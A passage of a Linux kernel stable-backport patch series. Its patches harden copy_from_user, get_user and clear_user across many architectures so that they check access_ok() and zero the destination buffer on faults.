df375880c853d9a9c99fa229f862bded0a6254dd Mon Sep 17 00:00:00 2001 From: Vineet Gupta Date: Fri, 19 Aug 2016 12:10:02 -0700 Subject: [PATCH 082/315] ARC: uaccess: get_user to zero out dest in cause of fault commit 05d9d0b96e53c52a113fd783c0c97c830c8dc7af upstream. Al reported potential issue with ARC get_user() as it wasn't clearing out destination pointer in case of fault due to bad address etc. Verified using following | { | u32 bogus1 = 0xdeadbeef; | u64 bogus2 = 0xdead; | int rc1, rc2; | | pr_info("Orig values %x %llx\n", bogus1, bogus2); | rc1 = get_user(bogus1, (u32 __user *)0x40000000); | rc2 = get_user(bogus2, (u64 __user *)0x50000000); | pr_info("access %d %d, new values %x %llx\n", | rc1, rc2, bogus1, bogus2); | } | [ARCLinux]# insmod /mnt/kernel-module/qtn.ko | Orig values deadbeef dead | access -14 -14, new values 0 0 Reported-by: Al Viro Cc: Linus Torvalds Cc: linux-snps-arc@lists.infradead.org Cc: linux-kernel@vger.kernel.org Signed-off-by: Vineet Gupta Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/arc/include/asm/uaccess.h | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/arch/arc/include/asm/uaccess.h b/arch/arc/include/asm/uaccess.h index 30c9baffa96..08770c75069 100644 --- a/arch/arc/include/asm/uaccess.h +++ b/arch/arc/include/asm/uaccess.h @@ -83,7 +83,10 @@ "2: ;nop\n" \ " .section .fixup, \"ax\"\n" \ " .align 4\n" \ - "3: mov %0, %3\n" \ + "3: # return -EFAULT\n" \ + " mov %0, %3\n" \ + " # zero out dst ptr\n" \ + " mov %1, 0\n" \ " j 2b\n" \ " .previous\n" \ " .section __ex_table, \"a\"\n" \ @@ -101,7 +104,11 @@ "2: ;nop\n" \ " .section .fixup, \"ax\"\n" \ " .align 4\n" \ - "3: mov %0, %3\n" \ + "3: # return -EFAULT\n" \ + " mov %0, %3\n" \ + " # zero out dst ptr\n" \ + " mov %1, 0\n" \ + " mov %R1, 0\n" \ " j 2b\n" \ " .previous\n" \ " .section __ex_table, \"a\"\n" \ From 44ccf7f165944ddfee863e33feeab32d0c231181 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Wed, 17 Aug 2016 23:19:01 -0400 Subject: [PATCH 083/315] asm-generic: make get_user() clear the destination on errors commit 9ad18b75c2f6e4a78ce204e79f37781f8815c0fa upstream. both for access_ok() failures and for faults halfway through Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- include/asm-generic/uaccess.h | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/include/asm-generic/uaccess.h b/include/asm-generic/uaccess.h index c184aa8ec8c..fee282ab2b4 100644 --- a/include/asm-generic/uaccess.h +++ b/include/asm-generic/uaccess.h @@ -228,14 +228,18 @@ extern int __put_user_bad(void) __attribute__((noreturn)); might_sleep(); \ access_ok(VERIFY_READ, ptr, sizeof(*ptr)) ? \ __get_user(x, ptr) : \ - -EFAULT; \ + ((x) = (__typeof__(*(ptr)))0,-EFAULT); \ }) #ifndef __get_user_fn static inline int __get_user_fn(size_t size, const void __user *ptr, void *x) { - size = __copy_from_user(x, ptr, size); - return size ? -EFAULT : size; + size_t n = __copy_from_user(x, ptr, size); + if (unlikely(n)) { + memset(x + (size - n), 0, n); + return -EFAULT; + } + return 0; } #define __get_user_fn(sz, u, k) __get_user_fn(sz, u, k) From 233d4b179cdd9440c3437bbeb4281a29772b5eba Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 18 Aug 2016 20:54:02 -0400 Subject: [PATCH 084/315] frv: fix clear_user() commit 3b8767a8f00cc6538ba6b1cf0f88502e2fd2eb90 upstream. It should check access_ok(). Otherwise a bunch of places turn into trivially exploitable rootholes. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/frv/include/asm/uaccess.h | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/arch/frv/include/asm/uaccess.h b/arch/frv/include/asm/uaccess.h index 0b67ec5b441..3a74137eeef 100644 --- a/arch/frv/include/asm/uaccess.h +++ b/arch/frv/include/asm/uaccess.h @@ -263,19 +263,25 @@ do { \ extern long __memset_user(void *dst, unsigned long count); extern long __memcpy_user(void *dst, const void *src, unsigned long count); -#define clear_user(dst,count) __memset_user(____force(dst), (count)) +#define __clear_user(dst,count) __memset_user(____force(dst), (count)) #define __copy_from_user_inatomic(to, from, n) __memcpy_user((to), ____force(from), (n)) #define __copy_to_user_inatomic(to, from, n) __memcpy_user(____force(to), (from), (n)) #else -#define clear_user(dst,count) (memset(____force(dst), 0, (count)), 0) +#define __clear_user(dst,count) (memset(____force(dst), 0, (count)), 0) #define __copy_from_user_inatomic(to, from, n) (memcpy((to), ____force(from), (n)), 0) #define __copy_to_user_inatomic(to, from, n) (memcpy(____force(to), (from), (n)), 0) #endif -#define __clear_user clear_user +static inline unsigned long __must_check +clear_user(void __user *to, unsigned long n) +{ + if (likely(__access_ok(to, n))) + n = __clear_user(to, n); + return n; +} static inline unsigned long __must_check __copy_to_user(void __user *to, const void *from, unsigned long n) From b5f6c58b909786ddc77d441d773ba558482611d2 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 18 Aug 2016 19:34:00 -0400 Subject: [PATCH 085/315] cris: buggered copy_from_user/copy_to_user/clear_user commit eb47e0293baaa3044022059f1fa9ff474bfe35cb upstream. * copy_from_user() on access_ok() failure ought to zero the destination * none of those primitives should skip the access_ok() check in case of small constant size. Acked-by: Jesper Nilsson Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/cris/include/asm/uaccess.h | 71 +++++++++++++++------------------ 1 file changed, 32 insertions(+), 39 deletions(-) diff --git a/arch/cris/include/asm/uaccess.h b/arch/cris/include/asm/uaccess.h index 914540801c5..93bfa8acc38 100644 --- a/arch/cris/include/asm/uaccess.h +++ b/arch/cris/include/asm/uaccess.h @@ -176,30 +176,6 @@ extern unsigned long __copy_user(void __user *to, const void *from, unsigned lon extern unsigned long __copy_user_zeroing(void *to, const void __user *from, unsigned long n); extern unsigned long __do_clear_user(void __user *to, unsigned long n); -static inline unsigned long -__generic_copy_to_user(void __user *to, const void *from, unsigned long n) -{ - if (access_ok(VERIFY_WRITE, to, n)) - return __copy_user(to,from,n); - return n; -} - -static inline unsigned long -__generic_copy_from_user(void *to, const void __user *from, unsigned long n) -{ - if (access_ok(VERIFY_READ, from, n)) - return __copy_user_zeroing(to,from,n); - return n; -} - -static inline unsigned long -__generic_clear_user(void __user *to, unsigned long n) -{ - if (access_ok(VERIFY_WRITE, to, n)) - return __do_clear_user(to,n); - return n; -} - static inline long __strncpy_from_user(char *dst, const char __user *src, long count) { @@ -262,7 +238,7 @@ __constant_copy_from_user(void *to, const void __user *from, unsigned long n) else if (n == 24) __asm_copy_from_user_24(to, from, ret); else - ret = __generic_copy_from_user(to, from, n); + ret = __copy_user_zeroing(to, from, n); return ret; } @@ -312,7 +288,7 @@ __constant_copy_to_user(void __user *to, const void *from, unsigned long n) else if (n == 24) __asm_copy_to_user_24(to, from, ret); else - ret = __generic_copy_to_user(to, from, n); + ret = __copy_user(to, from, n); return ret; } @@ -344,26 +320,43 @@ __constant_clear_user(void __user *to, unsigned long n) else if (n == 24) __asm_clear_24(to, ret); else - ret = __generic_clear_user(to, n); + ret = __do_clear_user(to, n); return ret; } -#define clear_user(to, n) \ -(__builtin_constant_p(n) ? \ - __constant_clear_user(to, n) : \ - __generic_clear_user(to, n)) +static inline size_t clear_user(void __user *to, size_t n) +{ + if (unlikely(!access_ok(VERIFY_WRITE, to, n))) + return n; + if (__builtin_constant_p(n)) + return __constant_clear_user(to, n); + else + return __do_clear_user(to, n); +} -#define copy_from_user(to, from, n) \ -(__builtin_constant_p(n) ? \ - __constant_copy_from_user(to, from, n) : \ - __generic_copy_from_user(to, from, n)) +static inline size_t copy_from_user(void *to, const void __user *from, size_t n) +{ + if (unlikely(!access_ok(VERIFY_READ, from, n))) { + memset(to, 0, n); + return n; + } + if (__builtin_constant_p(n)) + return __constant_copy_from_user(to, from, n); + else + return __copy_user_zeroing(to, from, n); +} -#define copy_to_user(to, from, n) \ -(__builtin_constant_p(n) ? \ - __constant_copy_to_user(to, from, n) : \ - __generic_copy_to_user(to, from, n)) +static inline size_t copy_to_user(void __user *to, const void *from, size_t n) +{ + if (unlikely(!access_ok(VERIFY_WRITE, to, n))) + return n; + if (__builtin_constant_p(n)) + return __constant_copy_to_user(to, from, n); + else + return __copy_user(to, from, n); +} /* We let the __ versions of copy_from/to_user inline, because they're often * used in fast paths and have only a small space overhead. From 668a740df2920bcf73ac7964550cae7028e17ea8 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Fri, 9 Sep 2016 19:16:58 -0400 Subject: [PATCH 086/315] blackfin: fix copy_from_user() commit 8f035983dd826d7e04f67b28acf8e2f08c347e41 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/blackfin/include/asm/uaccess.h | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/arch/blackfin/include/asm/uaccess.h b/arch/blackfin/include/asm/uaccess.h index 57701c3b8a5..a992a788409 100644 --- a/arch/blackfin/include/asm/uaccess.h +++ b/arch/blackfin/include/asm/uaccess.h @@ -177,11 +177,12 @@ static inline int bad_user_access_length(void) static inline unsigned long __must_check copy_from_user(void *to, const void __user *from, unsigned long n) { - if (access_ok(VERIFY_READ, from, n)) + if (likely(access_ok(VERIFY_READ, from, n))) { memcpy(to, (const void __force *)from, n); - else - return n; - return 0; + return 0; + } + memset(to, 0, n); + return n; } static inline unsigned long __must_check From a0c422b88e049760e3af9dcc74584b383464dcb0 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sun, 21 Aug 2016 22:30:44 -0400 Subject: [PATCH 087/315] score: fix copy_from_user() and friends commit b615e3c74621e06cd97f86373ca90d43d6d998aa upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/score/include/asm/uaccess.h | 41 ++++++++++++++++---------------- 1 file changed, 20 insertions(+), 21 deletions(-) diff --git a/arch/score/include/asm/uaccess.h b/arch/score/include/asm/uaccess.h index c882d961e5b..69326dfb894 100644 --- a/arch/score/include/asm/uaccess.h +++ b/arch/score/include/asm/uaccess.h @@ -296,35 +296,34 @@ extern int __copy_tofrom_user(void *to, const void *from, unsigned long len); static inline unsigned long copy_from_user(void *to, const void *from, unsigned long len) { - unsigned long over; + unsigned long res = len; - if (access_ok(VERIFY_READ, from, len)) - return __copy_tofrom_user(to, from, len); + if (likely(access_ok(VERIFY_READ, from, len))) + res = __copy_tofrom_user(to, from, len); - if ((unsigned long)from < TASK_SIZE) { - over = (unsigned long)from + len - TASK_SIZE; - return __copy_tofrom_user(to, from, len - over) + over; - } - return len; + if (unlikely(res)) + memset(to + (len - res), 0, res); + + return res; } static inline unsigned long copy_to_user(void *to, const void *from, unsigned long len) { - unsigned long over; + if (likely(access_ok(VERIFY_WRITE, to, len))) + len = __copy_tofrom_user(to, from, len); - if (access_ok(VERIFY_WRITE, to, len)) - return __copy_tofrom_user(to, from, len); - - if ((unsigned long)to < TASK_SIZE) { - over = (unsigned long)to + len - TASK_SIZE; - return __copy_tofrom_user(to, from, len - over) + over; - } return len; } -#define __copy_from_user(to, from, len) \ - __copy_tofrom_user((to), (from), (len)) +static inline unsigned long +__copy_from_user(void *to, const void *from, unsigned long len) +{ + unsigned long left = __copy_tofrom_user(to, from, len); + if (unlikely(left)) + memset(to + (len - left), 0, left); + return left; +} #define __copy_to_user(to, from, len) \ __copy_tofrom_user((to), (from), (len)) @@ -338,17 +337,17 @@ __copy_to_user_inatomic(void *to, const void *from, unsigned long len) static inline unsigned long __copy_from_user_inatomic(void *to, const void *from, unsigned long len) { - return __copy_from_user(to, from, len); + return __copy_tofrom_user(to, from, len); } -#define __copy_in_user(to, from, len) __copy_from_user(to, from, len) +#define __copy_in_user(to, from, len) __copy_tofrom_user(to, from, len) static inline unsigned long copy_in_user(void *to, const void *from, unsigned long len) { if (access_ok(VERIFY_READ, from, len) && access_ok(VERFITY_WRITE, to, len)) - return copy_from_user(to, from, len); + return __copy_tofrom_user(to, from, len); } /* From a6c16ec5a29417fcef420d1d014cc7e82345b371 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sun, 21 Aug 2016 23:39:47 -0400 Subject: [PATCH 088/315] sh: fix copy_from_user() commit 6e050503a150b2126620c1a1e9b3a368fcd51eac upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/sh/include/asm/uaccess.h | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/arch/sh/include/asm/uaccess.h b/arch/sh/include/asm/uaccess.h index 9486376605f..c04cc18ae9c 100644 --- a/arch/sh/include/asm/uaccess.h +++ b/arch/sh/include/asm/uaccess.h @@ -151,7 +151,10 @@ copy_from_user(void *to, const void __user *from, unsigned long n) __kernel_size_t __copy_size = (__kernel_size_t) n; if (__copy_size && __access_ok(__copy_from, __copy_size)) - return __copy_user(to, from, __copy_size); + __copy_size = __copy_user(to, from, __copy_size); + + if (unlikely(__copy_size)) + memset(to + (n - __copy_size), 0, __copy_size); return __copy_size; } From 0ea4b0e2cca3a9b233938b3542400e9d9b41b38b Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 18 Aug 2016 21:16:49 -0400 Subject: [PATCH 089/315] hexagon: fix strncpy_from_user() error return commit f35c1e0671728d1c9abc405d05ef548b5fcb2fc4 upstream. It's -EFAULT, not -1 (and contrary to the comment in there, __strnlen_user() can return 0 - on faults). Acked-by: Richard Kuo Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/hexagon/include/asm/uaccess.h | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/arch/hexagon/include/asm/uaccess.h b/arch/hexagon/include/asm/uaccess.h index e4127e4d6a5..25fc9049db8 100644 --- a/arch/hexagon/include/asm/uaccess.h +++ b/arch/hexagon/include/asm/uaccess.h @@ -102,7 +102,8 @@ static inline long hexagon_strncpy_from_user(char *dst, const char __user *src, { long res = __strnlen_user(src, n); - /* return from strnlen can't be zero -- that would be rubbish. */ + if (unlikely(!res)) + return -EFAULT; if (res > n) { copy_from_user(dst, src, n); From c946f64eb21446454d94213f7bebfddb6f17f05e Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 20 Aug 2016 16:18:53 -0400 Subject: [PATCH 090/315] mips: copy_from_user() must zero the destination on access_ok() failure commit e69d700535ac43a18032b3c399c69bf4639e89a2 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/mips/include/asm/uaccess.h | 3 +++ 1 file changed, 3 insertions(+) diff --git a/arch/mips/include/asm/uaccess.h b/arch/mips/include/asm/uaccess.h index f3fa3750f57..e09339df223 100644 --- a/arch/mips/include/asm/uaccess.h +++ b/arch/mips/include/asm/uaccess.h @@ -13,6 +13,7 @@ #include #include #include +#include /* * The fs value determines whether argument validity checking should be @@ -938,6 +939,8 @@ extern size_t __copy_user_inatomic(void *__to, const void *__from, size_t __n); might_fault(); \ __cu_len = __invoke_copy_from_user(__cu_to, __cu_from, \ __cu_len); \ + } else { \ + memset(__cu_to, 0, __cu_len); \ } \ __cu_len; \ }) From 61e7341c4b7c868ce1dbe20a687661bfab24d432 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Wed, 17 Aug 2016 16:36:37 -0400 Subject: [PATCH 091/315] asm-generic: make copy_from_user() zero the destination properly commit 2545e5da080b4839dd859e3b09343a884f6ab0e3 upstream. ... in all cases, including the failing access_ok() Note that some architectures using asm-generic/uaccess.h have __copy_from_user() not zeroing the tail on failure halfway through. This variant works either way. Signed-off-by: Al Viro [wt: s/might_fault/might_sleep] Signed-off-by: Willy Tarreau --- include/asm-generic/uaccess.h | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/include/asm-generic/uaccess.h b/include/asm-generic/uaccess.h index fee282ab2b4..a8203040f27 100644 --- a/include/asm-generic/uaccess.h +++ b/include/asm-generic/uaccess.h @@ -259,11 +259,13 @@ extern int __get_user_bad(void) __attribute__((noreturn)); static inline long copy_from_user(void *to, const void __user * from, unsigned long n) { + unsigned long res = n; might_sleep(); - if (access_ok(VERIFY_READ, from, n)) - return __copy_from_user(to, from, n); - else - return n; + if (likely(access_ok(VERIFY_READ, from, n))) + res = __copy_from_user(to, from, n); + if (unlikely(res)) + memset(to + (n - res), 0, res); + return res; } static inline long copy_to_user(void __user *to, From 351a44facc61b93c7f04ebe65c6ea52dba9761d6 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Wed, 17 Aug 2016 16:02:32 -0400 Subject: [PATCH 092/315] alpha: fix copy_from_user() commit 2561d309dfd1555e781484af757ed0115035ddb3 upstream. it should clear the destination even when access_ok() fails. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/alpha/include/asm/uaccess.h | 19 ++++++++----------- 1 file changed, 8 insertions(+), 11 deletions(-) diff --git a/arch/alpha/include/asm/uaccess.h b/arch/alpha/include/asm/uaccess.h index 766fdfde2b7..6e9d27ad510 100644 --- a/arch/alpha/include/asm/uaccess.h +++ b/arch/alpha/include/asm/uaccess.h @@ -371,14 +371,6 @@ __copy_tofrom_user_nocheck(void *to, const void *from, long len) return __cu_len; } -extern inline long -__copy_tofrom_user(void *to, const void *from, long len, const void __user *validate) -{ - if (__access_ok((unsigned long)validate, len, get_fs())) - len = __copy_tofrom_user_nocheck(to, from, len); - return len; -} - #define __copy_to_user(to,from,n) \ ({ \ __chk_user_ptr(to); \ @@ -393,17 +385,22 @@ __copy_tofrom_user(void *to, const void *from, long len, const void __user *vali #define __copy_to_user_inatomic __copy_to_user #define __copy_from_user_inatomic __copy_from_user - extern inline long copy_to_user(void __user *to, const void *from, long n) { - return __copy_tofrom_user((__force void *)to, from, n, to); + if (likely(__access_ok((unsigned long)to, n, get_fs()))) + n = __copy_tofrom_user_nocheck((__force void *)to, from, n); + return n; } extern inline long copy_from_user(void *to, const void __user *from, long n) { - return __copy_tofrom_user(to, (__force void *)from, n, from); + if (likely(__access_ok((unsigned long)from, n, get_fs()))) + n = __copy_tofrom_user_nocheck(to, (__force void *)from, n); + else + memset(to, 0, n); + return n; } extern void __do_clear_user(void); From d01c959ab25adb73a6531a937a98d54f1be66f26 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 18 Aug 2016 22:08:20 -0400 Subject: [PATCH 093/315] metag: copy_from_user() should zero the destination on access_ok() failure commit 8ae95ed4ae5fc7c3391ed668b2014c9e2079533b upstream. Acked-by: James Hogan Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/metag/include/asm/uaccess.h | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/arch/metag/include/asm/uaccess.h b/arch/metag/include/asm/uaccess.h index 0748b0a9798..7841f229038 100644 --- a/arch/metag/include/asm/uaccess.h +++ b/arch/metag/include/asm/uaccess.h @@ -199,8 +199,9 @@ extern unsigned long __must_check __copy_user_zeroing(void *to, static inline unsigned long copy_from_user(void *to, const void __user *from, unsigned long n) { - if (access_ok(VERIFY_READ, from, n)) + if (likely(access_ok(VERIFY_READ, from, n))) return __copy_user_zeroing(to, from, n); + memset(to, 0, n); return n; } From fc1e56cd13545cd821672840e90e230f4f4c8f60 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 20 Aug 2016 19:03:37 -0400 Subject: [PATCH 094/315] parisc: fix copy_from_user() commit aace880feea38875fbc919761b77e5732a3659ef upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/parisc/include/asm/uaccess.h | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/arch/parisc/include/asm/uaccess.h b/arch/parisc/include/asm/uaccess.h index e0a82358517..9bbddafb0da 100644 --- a/arch/parisc/include/asm/uaccess.h +++ b/arch/parisc/include/asm/uaccess.h @@ -9,6 +9,8 @@ #include #include +#include + #define VERIFY_READ 0 #define VERIFY_WRITE 1 @@ -246,13 +248,14 @@ static inline unsigned long __must_check copy_from_user(void *to, unsigned long n) { int sz = __compiletime_object_size(to); - int ret = -EFAULT; + unsigned long ret = n; if (likely(sz == -1 || !__builtin_constant_p(n) || sz >= n)) ret = __copy_from_user(to, from, n); else copy_from_user_overflow(); - + if (unlikely(ret)) + memset(to + (n - ret), 0, ret); return ret; } From 298c0771fbc5e35ae692c32b3efd5c4eb886c8c4 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 20 Aug 2016 17:05:21 -0400 Subject: [PATCH 095/315] openrisc: fix copy_from_user() commit acb2505d0119033a80c85ac8d02dccae41271667 upstream. ... that should zero on faults. Also remove the helpful logics wrt range truncation copied from ppc32. Where it had ever been needed only in case of copy_from_user() *and* had not been merged into the mainline until a month after the need had disappeared. A decade before openrisc went into mainline, I might add... Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/openrisc/include/asm/uaccess.h | 33 +++++++++-------------------- 1 file changed, 10 insertions(+), 23 deletions(-) diff --git a/arch/openrisc/include/asm/uaccess.h b/arch/openrisc/include/asm/uaccess.h index ab2e7a198a4..908c0904bdd 100644 --- a/arch/openrisc/include/asm/uaccess.h +++ b/arch/openrisc/include/asm/uaccess.h @@ -273,28 +273,20 @@ __copy_tofrom_user(void *to, const void *from, unsigned long size); static inline unsigned long copy_from_user(void *to, const void *from, unsigned long n) { - unsigned long over; + unsigned long res = n; - if (access_ok(VERIFY_READ, from, n)) - return __copy_tofrom_user(to, from, n); - if ((unsigned long)from < TASK_SIZE) { - over = (unsigned long)from + n - TASK_SIZE; - return __copy_tofrom_user(to, from, n - over) + over; - } - return n; + if (likely(access_ok(VERIFY_READ, from, n))) + n = __copy_tofrom_user(to, from, n); + if (unlikely(res)) + memset(to + (n - res), 0, res); + return res; } static inline unsigned long copy_to_user(void *to, const void *from, unsigned long n) { - unsigned long over; - - if (access_ok(VERIFY_WRITE, to, n)) - return __copy_tofrom_user(to, from, n); - if ((unsigned long)to < TASK_SIZE) { - over = (unsigned long)to + n - TASK_SIZE; - return __copy_tofrom_user(to, from, n - over) + over; - } + if (likely(access_ok(VERIFY_WRITE, to, n))) + n = __copy_tofrom_user(to, from, n); return n; } @@ -303,13 +295,8 @@ extern unsigned long __clear_user(void *addr, unsigned long size); static inline __must_check unsigned long clear_user(void *addr, unsigned long size) { - - if (access_ok(VERIFY_WRITE, addr, size)) - return __clear_user(addr, size); - if ((unsigned long)addr < TASK_SIZE) { - unsigned long over = (unsigned long)addr + size - TASK_SIZE; - return __clear_user(addr, size - over) + over; - } + if (likely(access_ok(VERIFY_WRITE, addr, size))) + size = __clear_user(addr, size); return size; } From 3c5d8c4f2d65be7a36a106e9d97221da46f7c7b6 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Sat, 17 Sep 2016 12:57:24 -0700 Subject: [PATCH 096/315] openrisc: fix the fix of copy_from_user() commit 8e4b72054f554967827e18be1de0e8122e6efc04 upstream. Since commit acb2505d0119 ("openrisc: fix copy_from_user()"), copy_from_user() returns the number of bytes requested, not the number of bytes not copied. Cc: Al Viro Fixes: acb2505d0119 ("openrisc: fix copy_from_user()") Signed-off-by: Guenter Roeck Signed-off-by: Willy Tarreau --- arch/openrisc/include/asm/uaccess.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/openrisc/include/asm/uaccess.h b/arch/openrisc/include/asm/uaccess.h index 908c0904bdd..d441480a4af 100644 --- a/arch/openrisc/include/asm/uaccess.h +++ b/arch/openrisc/include/asm/uaccess.h @@ -276,7 +276,7 @@ copy_from_user(void *to, const void *from, unsigned long n) unsigned long res = n; if (likely(access_ok(VERIFY_READ, from, n))) - n = __copy_tofrom_user(to, from, n); + res = __copy_tofrom_user(to, from, n); if (unlikely(res)) memset(to + (n - res), 0, res); return res; From 88e42bd1bf70d16e1aa4e510da333d09a3056559 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sat, 20 Aug 2016 16:33:10 -0400 Subject: [PATCH 097/315] mn10300: copy_from_user() should zero on access_ok() failure... commit ae7cc577ec2a4a6151c9e928fd1f595d953ecef1 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/mn10300/lib/usercopy.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/mn10300/lib/usercopy.c b/arch/mn10300/lib/usercopy.c index 7826e6c364e..ce8899e5e17 100644 --- a/arch/mn10300/lib/usercopy.c +++ b/arch/mn10300/lib/usercopy.c @@ -9,7 +9,7 @@ * as published by the Free Software Foundation; either version * 2 of the Licence, or (at your option) any later version. */ -#include +#include unsigned long __generic_copy_to_user(void *to, const void *from, unsigned long n) @@ -24,6 +24,8 @@ __generic_copy_from_user(void *to, const void *from, unsigned long n) { if (access_ok(VERIFY_READ, from, n)) __copy_user_zeroing(to, from, n); + else + memset(to, 0, n); return n; } From 601d2912d55094456f13cdedc1ec1fe34b746b56 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Mon, 22 Aug 2016 00:23:07 -0400 Subject: [PATCH 098/315] sparc32: fix copy_from_user() commit 917400cecb4b52b5cde5417348322bb9c8272fa6 upstream. Acked-by: David S. Miller Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/sparc/include/asm/uaccess_32.h | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/sparc/include/asm/uaccess_32.h b/arch/sparc/include/asm/uaccess_32.h index 53a28dd59f5..01f602858de 100644 --- a/arch/sparc/include/asm/uaccess_32.h +++ b/arch/sparc/include/asm/uaccess_32.h @@ -265,8 +265,10 @@ static inline unsigned long copy_from_user(void *to, const void __user *from, un { if (n && __access_ok((unsigned long) from, n)) return __copy_user((__force void __user *) to, from, n); - else + else { + memset(to, 0, n); return n; + } } static inline unsigned long __copy_from_user(void *to, const void __user *from, unsigned long n) From 37b00bc9291ce26e041bca983434cdbc9f3ad201 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Sun, 21 Aug 2016 19:16:26 -0400 Subject: [PATCH 099/315] ppc32: fix copy_from_user() commit 224264657b8b228f949b42346e09ed8c90136a8e upstream. should clear on access_ok() failures. Also remove the useless range truncation logics. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/powerpc/include/asm/uaccess.h | 21 ++------------------- 1 file changed, 2 insertions(+), 19 deletions(-) diff --git a/arch/powerpc/include/asm/uaccess.h b/arch/powerpc/include/asm/uaccess.h index 4db49590acf..1d47060f488 100644 --- a/arch/powerpc/include/asm/uaccess.h +++ b/arch/powerpc/include/asm/uaccess.h @@ -323,30 +323,17 @@ extern unsigned long __copy_tofrom_user(void __user *to, static inline unsigned long copy_from_user(void *to, const void __user *from, unsigned long n) { - unsigned long over; - - if (access_ok(VERIFY_READ, from, n)) + if (likely(access_ok(VERIFY_READ, from, n))) return __copy_tofrom_user((__force void __user *)to, from, n); - if ((unsigned long)from < TASK_SIZE) { - over = (unsigned long)from + n - TASK_SIZE; - return __copy_tofrom_user((__force void __user *)to, from, - n - over) + over; - } + memset(to, 0, n); return n; } static inline unsigned long copy_to_user(void __user *to, const void *from, unsigned long n) { - unsigned long over; - if (access_ok(VERIFY_WRITE, to, n)) return __copy_tofrom_user(to, (__force void __user *)from, n); - if ((unsigned long)to < TASK_SIZE) { - over = (unsigned long)to + n - TASK_SIZE; - return __copy_tofrom_user(to, (__force void __user *)from, - n - over) + over; - } return n; } @@ -437,10 +424,6 @@ static inline unsigned long clear_user(void __user *addr, unsigned long size) might_sleep(); if (likely(access_ok(VERIFY_WRITE, addr, size))) return __clear_user(addr, size); - if ((unsigned long)addr < TASK_SIZE) { - unsigned long over = (unsigned long)addr + size - TASK_SIZE; - return __clear_user(addr, size - over) + over; - } return size; } From 1eeb8d13b5e501a072e1b68ae63cac516fd5b34f Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 18 Aug 2016 21:31:41 -0400 Subject: [PATCH 100/315] ia64: copy_from_user() should zero the destination on access_ok() failure commit a5e541f796f17228793694d64b507f5f57db4cd7 upstream. Signed-off-by: Al Viro Signed-off-by: Willy Tarreau --- arch/ia64/include/asm/uaccess.h | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/arch/ia64/include/asm/uaccess.h b/arch/ia64/include/asm/uaccess.h index 449c8c0fa2b..810926c56e3 100644 --- a/arch/ia64/include/asm/uaccess.h +++ b/arch/ia64/include/asm/uaccess.h @@ -262,17 +262,15 @@ __copy_from_user (void *to, const void __user *from, unsigned long count) __cu_len; \ }) -#define copy_from_user(to, from, n) \ -({ \ - void *__cu_to = (to); \ - const void __user *__cu_from = (from); \ - long __cu_len = (n); \ - \ - __chk_user_ptr(__cu_from); \ - if (__access_ok(__cu_from, __cu_len, get_fs())) \ - __cu_len = __copy_user((__force void __user *) __cu_to, __cu_from, __cu_len); \ - __cu_len; \ -}) +static inline unsigned long +copy_from_user(void *to, const void __user *from, unsigned long n) +{ + if (likely(__access_ok(from, n, get_fs()))) + n = __copy_user((__force void __user *) to, from, n); + else + memset(to, 0, n); + return n; +} #define __copy_in_user(to, from, size) __copy_user((to), (from), (size)) From 138c012118e405ffb9ff480c21c00082c9dbc386 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Tue, 20 Sep 2016 20:07:42 +0100 Subject: [PATCH 101/315] fix fault_in_multipages_...() on architectures with no-op access_ok() commit e23d4159b109167126e5bcd7f3775c95de7fee47 upstream. Switching iov_iter fault-in to multipages variants has exposed an old bug in underlying fault_in_multipages_...(); they break if the range passed to them wraps around. Normally access_ok() done by callers will prevent such (and it's a guaranteed EFAULT - ERR_PTR() values fall into such a range and they should not point to any valid objects). However, on architectures where 